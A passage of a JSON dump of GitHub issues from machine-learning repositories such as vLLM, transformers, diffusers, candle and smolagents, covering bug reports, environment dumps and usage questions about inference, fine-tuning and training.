seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic I\nBRS; IBPB conditional; STIBP always-on; PBRSB-eIBRS Not affected; BHI Not affected\nVulnerability Srbds: Not affected\nVulnerability Tsa: Not", "url": "https://github.com/vllm-project/vllm/issues/27634", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-28T06:24:38Z", "updated_at": "2025-10-28T15:57:47Z", "comments": 3, "user": "Septemberlemon" }, { "repo": "huggingface/candle", "number": 3151, "title": "Tensor conversion to_vec1() failing on 0.9.2-alpha.1 - Metal", "body": "Dependencies\n\n```toml\ncandle-core = { git = \"https://github.com/huggingface/candle\", rev = \"df618f8\", features = [\"metal\"] }\ncandle-nn = { git = \"https://github.com/huggingface/candle\", rev = \"df618f8\", features = [\"metal\"] }\ncandle-transformers = { git = \"https://github.com/huggingface/candle\", rev = \"df618f8\", features = [\"metal\"] }\n```\n\nRunning on Macbook M2 Pro - Metal - Tahoe 26.0.1\n\nSince upgrading to 0.9.2-alpha.1, BERT operations on Metal have started hanging when converting rank-1 tensor to Vec<32>. This seems to be affecting any ops that attempt to synchronize or move data from GPU to CPU. Not sure if this is directly related to the update but rolling back to 0.9.1 or using CPU as device fixes the issue. \n\nSome example of ops that are failing...\n\n```rust\ntensor.device().synchronize()\ntensor.to_device()\ntensor.to_vec1()\n```\n\nActual code being run...\n\n```rust\nlet (token_ids, token_type_ids, attention_mask) = self.encode_text(text)?;\n\nlet hidden_states = self\n .forward_model(&token_ids, &token_type_ids, &attention_mask)\n .await\n .map_err(|e| {\n log::error!(\"Failed to forward to model: {}\", e);\n e\n })?;\n\nlet embeddings = self\n .apply_mean_pooling(&hidden_states, &attention_mask)\n .map_err(|e| {\n log::error!(\"Failed to apply mean pooling: {}\", e);\n e\n })?;\n\n...\n\nfn apply_mean_pooling(\n &self,\n hidden_states: &Tensor,\n attention_mask: &Tensor,\n ) -> Result> {\n log::info!(\"Applying mean pooling to hidden states...\");\n\n let attention_mask_for_pooling = attention_mask\n .to_dtype(hidden_states.dtype())?\n .unsqueeze(2)?;\n let sum_mask = attention_mask_for_pooling.sum(1)?;\n\n let pooled = (hidden_states.broadcast_mul(&attention_mask_for_pooling)?).sum(1)?;\n let sum_mask_safe = sum_mask.clamp(NUMERICAL_STABILITY_EPSILON, f32::MAX)?;\n let pooled = pooled.broadcast_div(&sum_mask_safe)?;\n\n let denom = pooled\n .sqr()?\n .sum_keepdim(1)?\n .sqrt()?\n .clamp(NUMERICAL_STABILITY_EPSILON, f32::MAX)?;\n\n let pooled = pooled.broadcast_div(&denom)?;\n let pooled = pooled.squeeze(0)?;\n \n // HANGING HERE ... no errors\n // Tensor shape - Tensor[dims 1024; f32, metal:4294968337]\n let embeddings = pooled.to_vec1::().map_err(|e| Error::TensorOp {\n operation: format!(\"Failed to convert tensor to f32 vector: {}\", e),\n })?;\n\n Ok(embeddings)\n }\n```", "url": "https://github.com/huggingface/candle/issues/3151", "state": "closed", "labels": [], "created_at": "2025-10-27T21:36:17Z", "updated_at": "2025-11-06T22:44:14Z", "comments": 2, "user": "si-harps" }, { "repo": "vllm-project/vllm", "number": 27604, "title": "[Bug]: Is Flashinfer Attn backend supposed to work with FP8 KV cache on Hopper?", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Amazon Linux 2023.7.20250428 (x86_64)\nGCC version : (GCC) 11.5.0 20240719 (Red Hat 11.5.0-5)\nClang version : Could not collect\nCMake version : version 3.26.4\nLibc version : glibc-2.34\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.6 (main, May 6 2025, 20:22:13) [GCC 11.5.0 20240719 (Red Hat 11.5.0-5)] (64-bit runtime)\nPython platform : Linux-6.1.134-150.224.amzn2023.x86_64-x86_64-with-glibc2.34\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA H100 80GB HBM3\nGPU 1: NVIDIA H100 80GB HBM3\nGPU 2: NVIDIA H100 80GB HBM3\nGPU 3: NVIDIA H100 80GB HBM3\nGPU 4: NVIDIA H100 80GB HBM3\nGPU 5: NVIDIA H100 80GB HBM3\nGPU 6: NVIDIA H100 80GB HBM3\nGPU 7: NVIDIA H100 80GB HBM3\n\nNvidia driver version : 570.133.20\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 48 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 7R13 Processor\nCPU family: 25\nModel: 1\nThread(s) per core: 2\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 1\nBogoMIPS: 5299.99\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid aperfmperf tsc_known_freq pni pclmulqdq monitor ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm cmp_legacy cr8_legacy abm sse4a misalignsse 3dnowprefetch topoext perfctr_core invpcid_single ssbd ibrs ibpb stibp vmmcall fsgsbase bmi1 avx2 smep bmi2 invpcid rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 clzero xsaveerptr rdpru wbnoinvd arat npt nrip_save vaes vpclmulqdq rdpid\nHypervisor vendor: KVM\nVirtualization type: full\nL1d cache: 3 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 48 MiB (96 instances)\nL3 cache: 384 MiB (12 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-47,96-143\nNUMA node1 CPU(s): 48-95,144-191\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Mitigation; safe RET\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Retpolines; IBPB conditional; IBRS_FW; STIBP always-on; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.3.1\n[pip3] numpy==2.2.6\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.15.0\n[pip3] nvidia-cufft-cu12==11.3.3.83\n[pi", "url": "https://github.com/vllm-project/vllm/issues/27604", "state": "open", "labels": [ "bug", "nvidia" ], "created_at": "2025-10-27T20:22:37Z", "updated_at": "2025-11-06T02:37:17Z", "comments": 10, "user": "jmkuebler" }, { "repo": "huggingface/smolagents", "number": 1834, "title": "Discussion: how to edit the messages sent to the underlying LLM", "body": "Hi! I'm working on a feature to allow a user to add callbacks to modify the content before it is sent to the LLM, inside the agent loop. \n\nI noticed this strange behavior where the first user message must start with \"New Task:\", otherwise I get this cryptic and misleading error message.\n\n\n\"\"Error:\\nError while parsing tool call from model output: The model output does not contain any JSON blob.\\nNow let's retry: take care not to repeat previous errors! If you have retried several times, try a completely different approach.\\n\"\"\n\nSo I think I have two (or maybe one question):\n\n1. Is my approach to control the messages flow by wrapping the `generate` member function of a Smolagent correct? Or do you recommend a better way to modify messages before sending them to the underlying LLM?\n2. Is it expected that the first user message needs to start with New Task:, or have I found a bug or missing assertion somewhere in the code? Thanks!\n\nhttps://github.com/mozilla-ai/any-agent/blob/f2475d7507c5a78e241ff5f0883b546d796d29fc/src/any_agent/callbacks/wrappers/smolagents.py#L75\n\nI'm on smolagents==1.22.0, python 3.13.\n\nUPDATE: I'm no longer sure that adding \"New Task:\" is the fix, I am still seeing intermittent errors even when I have that text added. It seems like there some sort of race condition, I'm confused about where the \"messages\" content should be edited, since it seems like maybe it's being stored or referenced in multiple conditions? Any help appreciated!\n", "url": "https://github.com/huggingface/smolagents/issues/1834", "state": "closed", "labels": [], "created_at": "2025-10-27T17:28:38Z", "updated_at": "2025-10-27T19:02:39Z", "user": "njbrake" }, { "repo": "huggingface/peft", "number": 2873, "title": "Can I use Lora fine-tuning twice?", "body": "I\u2019m planning to work with a two-stage LoRA fine-tuning pipeline (Stage 1: SFT with code completion outputs; Stage 2: SFT with full-code outputs; RL follows). My question is:\nWhen I continue training the same LoRA adapter in Stage 2, will I risk overwriting or degrading the knowledge learned during Stage 1 ? In other words, does continuing on the same adapter effectively preserve the Stage 1 capabilities, or should I be using a separate adapter (or merging strategy) to ensure both sets of skills remain intact?\nThank you for any guidance or best\u2010practice pointers!", "url": "https://github.com/huggingface/peft/issues/2873", "state": "closed", "labels": [], "created_at": "2025-10-27T12:51:45Z", "updated_at": "2025-12-05T15:05:00Z", "comments": 8, "user": "tohokulgq" }, { "repo": "vllm-project/vllm", "number": 27572, "title": "[Bug]: chat/completions stream intermittently returns null as finish_reason", "body": "### Your current environment\n\n```\nMy env:\nvllm 0.10.0\n```\n\n\n### \ud83d\udc1b Describe the bug\n\n\n```\n\n+ curl -kLsS https://127.0.0.1:7888/v1/chat/completions -H 'Content-Type: application/json' --data '{\n \"model\": \"ibm/granite-3-8b-instruct\",\n \"stream\": true,\n \"messages\": [\n {\n \"role\": \"system\",\n \"content\": \"You are a helpful assistant.\"\n },\n {\n \"role\": \"user\",\n \"content\": \"What is the weather like in Warsaw?\"\n }\n ],\n \"tools\": [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_current_weather\",\n \"description\": \"Get the current weather in a given location\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"location\": {\n \"type\": \"string\",\n \"description\": \"The city and state, e.g. San Francisco, CA\"\n },\n \"unit\": {\n \"type\": \"string\",\n \"enum\": [\"celsius\", \"fahrenheit\"]\n }\n }\n },\n \"required\": [\"location\"]\n }\n }\n ],\n \"tool_choice\": \"auto\"\n }'\ndata: {\"id\":\"chatcmpl-6ca98c2f19c13c19f39013dfb78bcece\",\"object\":\"chat.completion.chunk\",\"created\":1761566772,\"model\":\"ibm/granite-3-8b-instruct\",\"choices\":[{\"index\":0,\"delta\":{\"role\":\"assistant\",\"content\":\"\"},\"logprobs\":null,\"finish_reason\":null}]}\n\ndata: {\"id\":\"chatcmpl-6ca98c2f19c13c19f39013dfb78bcece\",\"object\":\"chat.completion.chunk\",\"created\":1761566772,\"model\":\"ibm/granite-3-8b-instruct\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\"<\"},\"logprobs\":null,\"finish_reason\":null}]}\n\ndata: {\"id\":\"chatcmpl-6ca98c2f19c13c19f39013dfb78bcece\",\"object\":\"chat.completion.chunk\",\"created\":1761566772,\"model\":\"ibm/granite-3-8b-instruct\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\"tool\"},\"logprobs\":null,\"finish_reason\":null}]}\n\ndata: {\"id\":\"chatcmpl-6ca98c2f19c13c19f39013dfb78bcece\",\"object\":\"chat.completion.chunk\",\"created\":1761566772,\"model\":\"ibm/granite-3-8b-instruct\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\"_\"},\"logprobs\":null,\"finish_reason\":null}]}\n\ndata: {\"id\":\"chatcmpl-6ca98c2f19c13c19f39013dfb78bcece\",\"object\":\"chat.completion.chunk\",\"created\":1761566772,\"model\":\"ibm/granite-3-8b-instruct\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\"call\"},\"logprobs\":null,\"finish_reason\":null}]}\n\ndata: {\"id\":\"chatcmpl-6ca98c2f19c13c19f39013dfb78bcece\",\"object\":\"chat.completion.chunk\",\"created\":1761566772,\"model\":\"ibm/granite-3-8b-instruct\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\">\"},\"logprobs\":null,\"finish_reason\":null}]}\n\ndata: [DONE]\n```\nThis happens after running several requests sequentially.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27572", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-27T12:14:03Z", "updated_at": "2025-11-24T20:27:24Z", "comments": 13, "user": "shuynh2017" }, { "repo": "huggingface/chat-ui", "number": 1957, "title": "Fail to use proxy", "body": "How to make this web app go through local proxy? \n\nI tried a few methods, all of which don't work. \n", "url": "https://github.com/huggingface/chat-ui/issues/1957", "state": "open", "labels": [ "support" ], "created_at": "2025-10-27T06:31:51Z", "updated_at": "2025-10-30T03:31:24Z", "comments": 2, "user": "geek0011" }, { "repo": "huggingface/diffusers", "number": 12547, "title": "Fine tuning Dreambooth Flux Kontext I2I Error: the following arguments are required: --instance_prompt", "body": "### Describe the bug\n\nHello HF team, @sayakpaul @bghira\n\nI'm encountering a persistent issue when trying to fine-tune the black-forest-labs/FLUX.1-Kontext-dev model using the train_dreambooth_lora_flux_kontext.py script.\n\nI am following the [official README instructions](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/README_flux.md#training-kontext) for Image-to-Image (I2I) finetuning. My goal is to train a transformation on my own dataset, which is structured for I2I (condition image, target image, and text instruction).\n\n### The Problem\nEvery time I run the script with the correct arguments for I2I finetuning, I get a : `the following arguments are required: --instance_prompt`\n\nWhen I run this [Reproduction], I receive the error: `the following arguments are required: --instance_prompt.`\n\nTo isolate the issue from my personal dataset, I also tested the exact example command provided in the documentation (the one using `kontext-community/relighting`). I found that this command also fails with `the identical the following arguments are required: --instance_prompt` error.\n\nGiven that both my custom command and the official example command are failing in the same way, I am trying to understand the origin of this error. It seems the `--instance_prompt` argument is being required even when all I2I-specific arguments are provided.\n\n### Environment\n**Script**: `examples/dreambooth/train_dreambooth_lora_flux_kontext.py`\n\n**Diffusers Version**: I am using the specific commit `05e7a854d0a5661f5b433f6dd5954c224b104f0b` (installed via `pip install -e .` from a clone), as recommended in the README.\n\nCould you please help me understand why this might be happening? Is this expected behavior, or am I perhaps missing a configuration step?\n\nThank you for your time!\n\n### Reproduction\n\n### How to Reproduce\nI am running the following command, which provides all the necessary arguments for I2I finetuning using my (`dataset_name`, `image_column`, `cond_image_column`, and `caption_column`) using my public dataset:\n\n```\naccelerate launch /local-git-path/train_dreambooth_lora_flux_kontext.py \\\n --pretrained_model_name_or_path=\"black-forest-labs/FLUX.1-Kontext-dev\" \\\n --output_dir=\"/local-path/kontext-finetuning-v1\" \\\n --dataset_name=\"MichaelMelgarejoTotto/mi-dataset-kontext\" \\\n --image_column=\"output\" \\\n --cond_image_column=\"file_name\" \\\n --caption_column=\"instruccion\" \\\n --mixed_precision=\"bf16\" \\\n --resolution=1024 \\\n --train_batch_size=1 \\\n --guidance_scale=1 \\\n --gradient_accumulation_steps=4 \\\n --gradient_checkpointing \\\n --optimizer=\"adamw\" \\\n --use_8bit_adam \\\n --cache_latents \\\n --learning_rate=1e-4 \\\n --lr_scheduler=\"constant\" \\\n --lr_warmup_steps=200 \\\n --max_train_steps=1000 \\\n --rank=16 \\\n --seed=\"0\" \n```\n\n\n### Logs\n\n```shell\ntrain_dreambooth_lora_flux_kontext.py: error: the following arguments are required: --instance_prompt\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.35.0.dev0\n- Platform: Linux-4.18.0-305.3.1.el8.x86_64-x86_64-with-glibc2.28\n- Running on Google Colab?: No\n- Python version: 3.10.19\n- PyTorch version (GPU?): 2.7.1+cu118 (False)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.36.0\n- Transformers version: 4.57.1\n- Accelerate version: 1.11.0\n- PEFT version: 0.17.1\n- Bitsandbytes version: 0.48.1\n- Safetensors version: 0.6.2\n- xFormers version: not installed\n- Accelerator: NA\n- Using GPU in script?: \n- Using distributed or parallel set-up in script?: \n\n\"Image\"\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12547", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-27T00:21:34Z", "updated_at": "2025-10-28T02:31:42Z", "comments": 7, "user": "MichaelMelgarejoFlorez" }, { "repo": "huggingface/transformers", "number": 41876, "title": "LlamaAttention num_heads", "body": "### System Info\n\nIn older version of transformers, LlamaAttention init attribute num_heads. \n\nclass LlamaAttention(nn.Module):\n def __init__(self, config):\n self.num_heads = config.num_attention_heads\n self.head_dim = config.hidden_size // config.num_attention_heads\n\nHowever, in the recent versions, this attribute has been removed and thus causing mismatched when using previous codes. It ssems num_key_value_heads is also deprecated. This issue could be addressed by adding:\n self.num_heads = config.num_attention_heads # shanhx\n self.num_key_value_heads = config.num_key_value_heads\n\nIs there any reasons why these attributes are removed? Is it intended or a bug?\n\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nAt least the num_heads stil remained at 4.44. But missed in 4.54. \n\n### Expected behavior\n\nMissing many attributes in LlamaAttention. ", "url": "https://github.com/huggingface/transformers/issues/41876", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-27T00:07:31Z", "updated_at": "2025-10-31T00:13:31Z", "comments": 2, "user": "shanhx2000" }, { "repo": "huggingface/transformers", "number": 41874, "title": "Distributed training of SigCLIP", "body": "https://github.com/huggingface/transformers/blob/v4.57.1/src/transformers/models/siglip/modeling_siglip.py#L983, here define how to compute sigclip loss. In sigclip, different tpu will exchange data with each other. I want to know how to train a model in this way.", "url": "https://github.com/huggingface/transformers/issues/41874", "state": "closed", "labels": [], "created_at": "2025-10-26T14:43:51Z", "updated_at": "2025-12-04T08:02:55Z", "comments": 1, "user": "zyk1559676097-dot" }, { "repo": "huggingface/transformers", "number": 41861, "title": "transformers.Adafactor is almost 2x slower on Windows than Linux - even WSL is slow what can be reason?", "body": "I am training Qwen Image model with Kohya Musubi tuner : https://github.com/kohya-ss/musubi-tuner\n \nExactly same setup and same machine on Linux is almost 2x faster\n\n9.5 second / it vs 5.8 second / it\n\nOn Windows it can't utilize GPU power it utilizes like 250 watt out of 575 watt\n\nWhat can be culprit?\n\ntransformers==4.54.1\ntorch 2.8\nCUDA 12.9\n\ntested on RTX 5090\n\nthis is what codex tells but i don't know if it is true doesnt make sense to me\n\n\"Image\"\n\n### Who can help?\n\ntrainer: @SunMarc \nkernels: @MekkCyber @drbh \n\n\n", "url": "https://github.com/huggingface/transformers/issues/41861", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-25T15:49:47Z", "updated_at": "2025-12-03T08:02:55Z", "user": "FurkanGozukara" }, { "repo": "huggingface/transformers", "number": 41859, "title": "Human Verification not working?", "body": "### System Info\n\nHello! I need your help because I can't verify my identity via email: I receive a link, open it, but get a blank page and nothing else(((\nI've tried several times.\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n1. Navigate to the Hugging Face website.\n2. Register or log in to your account.\n3. Go to the identity verification section.\n4. Submit a request for the identity verification link.\n5. Get the confirmation email to arrive.\n6. Follow confirmation link in email\n7. Get blank page in site example https://huggingface.co/email_confirmation/zKFZszGtcabRsYOURYmCQkXdfzIY\n\n### Expected behavior\n\nThe identity verification link should work", "url": "https://github.com/huggingface/transformers/issues/41859", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-25T10:48:52Z", "updated_at": "2025-10-26T12:29:10Z", "comments": 4, "user": "thefued" }, { "repo": "huggingface/lerobot", "number": 2311, "title": "Question: How I can train only online without dataset?", "body": "How I can train only online? without need of dataset. Can I do it without hugging face repo id? only local?\nI try like that without success:\n\n```\n cat > \"train_cfg.json\" <<'JSON'\n {\n \"job_name\": \"hilserl_fetch_pick_v4_cpu\",\n \"seed\": 0,\n \"env\": {\n \"type\": \"gymnasium-robotics\",\n \"task\": \"FetchPickAndPlace-v4\",\n \"episode_length\": 200,\n \"features_map\": {\n \"action\": \"action\",\n \"agent_pos\": \"observation.state\",\n \"top\": \"observation.image\",\n \"pixels/top\": \"observation.image\"\n },\n \"features\": {\n \"action\": {\n \"type\": \"ACTION\",\n \"shape\": [\n 4\n ]\n },\n \"agent_pos\": {\n \"type\": \"STATE\",\n \"shape\": [\n 4\n ]\n },\n \"pixels/top\": {\n \"type\": \"VISUAL\",\n \"shape\": [\n 480,\n 480,\n 3\n ]\n }\n }\n },\n \"policy\": {\n \"type\": \"sac\",\n \"device\": \"cpu\",\n \"concurrency\": {\n \"actor\": \"threads\",\n \"learner\": \"threads\"\n },\n \"repo_id\": \"None\",\n \"push_to_hub\": false\n },\n \"dataset\": { \n \"repo_id\": \"online-buffer\",\n \"root\": \"${{ github.workspace }}/dataset\",\n \"use_imagenet_stats\": true\n }\n }\n JSON\n\n mkdir -p dataset/online-buffer\n\n export HF_HUB_OFFLINE=1\n export HF_HUB_DISABLE_TELEMETRY=1\n export HF_DATASETS_OFFLINE=1\n export WANDB_MODE=disabled\n\n # Launch learner and actor (one shell)\n python -m lerobot.rl.learner --config_path \"train_cfg.json\"\n python -m lerobot.rl.actor --config_path \"train_cfg.json\"\n```", "url": "https://github.com/huggingface/lerobot/issues/2311", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-10-25T05:07:48Z", "updated_at": "2025-10-27T08:50:11Z", "user": "talregev" }, { "repo": "vllm-project/vllm", "number": 27505, "title": "[Bug]: Value error, Found conflicts between 'rope_type=default' (modern field) and 'type=mrope'", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nvllm 0.11.0\ntransformers 5.0.0.dev0\ntorch 2.8.0+cu129\n\nmodel base: Qwen2.5-VL-7B-instruct. How to solve this problem\uff1f\n\"Image\"\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27505", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-25T04:39:53Z", "updated_at": "2025-10-26T07:33:27Z", "comments": 1, "user": "asirgogogo" }, { "repo": "vllm-project/vllm", "number": 27504, "title": "[Usage]: `add_vision_id` ignored for Qwen 2.5-VL-32B-Instruct", "body": "### Your current environment\n\n```text\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.3 (main, Aug 14 2025, 17:47:21) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.8.0-85-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA RTX A6000\nGPU 1: NVIDIA RTX A6000\nGPU 2: NVIDIA RTX A6000\nGPU 3: NVIDIA RTX A6000\n\nNvidia driver version : 570.124.06\ncuDNN version : Probably one of the following:\n/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn.so.9.8.0\n/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_adv.so.9.8.0\n/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_cnn.so.9.8.0\n/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_engines_precompiled.so.9.8.0\n/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_engines_runtime_compiled.so.9.8.0\n/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_graph.so.9.8.0\n/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_heuristic.so.9.8.0\n/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_ops.so.9.8.0\n/usr/local/cuda-12.8/targets/x86_64-linux/lib/libcudnn.so.9.8.0\n/usr/local/cuda-12.8/targets/x86_64-linux/lib/libcudnn_adv.so.9.8.0\n/usr/local/cuda-12.8/targets/x86_64-linux/lib/libcudnn_cnn.so.9.8.0\n/usr/local/cuda-12.8/targets/x86_64-linux/lib/libcudnn_engines_precompiled.so.9.8.0\n/usr/local/cuda-12.8/targets/x86_64-linux/lib/libcudnn_engines_runtime_compiled.so.9.8.0\n/usr/local/cuda-12.8/targets/x86_64-linux/lib/libcudnn_graph.so.9.8.0\n/usr/local/cuda-12.8/targets/x86_64-linux/lib/libcudnn_heuristic.so.9.8.0\n/usr/local/cuda-12.8/targets/x86_64-linux/lib/libcudnn_ops.so.9.8.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 32\nOn-line CPU(s) list: 0-31\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Gold 6346 CPU @ 3.10GHz\nCPU family: 6\nModel: 106\nThread(s) per core: 1\nCore(s) per socket: 16\nSocket(s): 2\nStepping: 6\nCPU(s) scaling MHz: 23%\nCPU max MHz: 3600.0000\nCPU min MHz: 800.0000\nBogoMIPS: 6200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 intel_ppin ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect wbnoinvd dtherm ida arat pln pts vnmi avx512vbmi umip pku ospke avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid fsrm md_clear pconfig flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 1.5 MiB (32 instances)\nL1i cache: 1 MiB (32 instances)\nL2 cache: 40 MiB (32 instances)\nL3 cache: 72 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-15\nNUMA node1 CPU(s): 16-3", "url": "https://github.com/vllm-project/vllm/issues/27504", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-25T03:42:44Z", "updated_at": "2025-10-26T07:32:49Z", "comments": 1, "user": "justachetan" }, { "repo": "huggingface/lighteval", "number": 1028, "title": "How to evaluate MMLU-Pro", "body": "Hi,\n\nThank you for the wonderful work!\n\nI just want to ask how to perform the evaluation on MMLU-Pro, as I don't see any related code besides the README.", "url": "https://github.com/huggingface/lighteval/issues/1028", "state": "open", "labels": [], "created_at": "2025-10-24T20:03:10Z", "updated_at": "2025-11-04T10:40:46Z", "user": "qhz991029" }, { "repo": "huggingface/tokenizers", "number": 1879, "title": "rust tokenizer", "body": "Hello.\n\nIs there a rust tokenizer please? Chat gpt told me there used to be.\n\nBest regards!", "url": "https://github.com/huggingface/tokenizers/issues/1879", "state": "open", "labels": [], "created_at": "2025-10-24T17:03:04Z", "updated_at": "2025-10-24T22:03:31Z", "comments": 2, "user": "gogo2464" }, { "repo": "vllm-project/vllm", "number": 27482, "title": "[Bug]: `return_token_ids` missing tokens when using tool calls", "body": "### Your current environment\n\nTesting with latest vLLM builds from main, as of Fri Oct 24th 2025 (when this bug was opened).\n\n\n### \ud83d\udc1b Describe the bug\n\nThe `return_token_ids` parameter that is supposed to return all generated token ids back to the client is missing quite a few tokens for Chat Completion streaming requests that result in tool calls being generated. 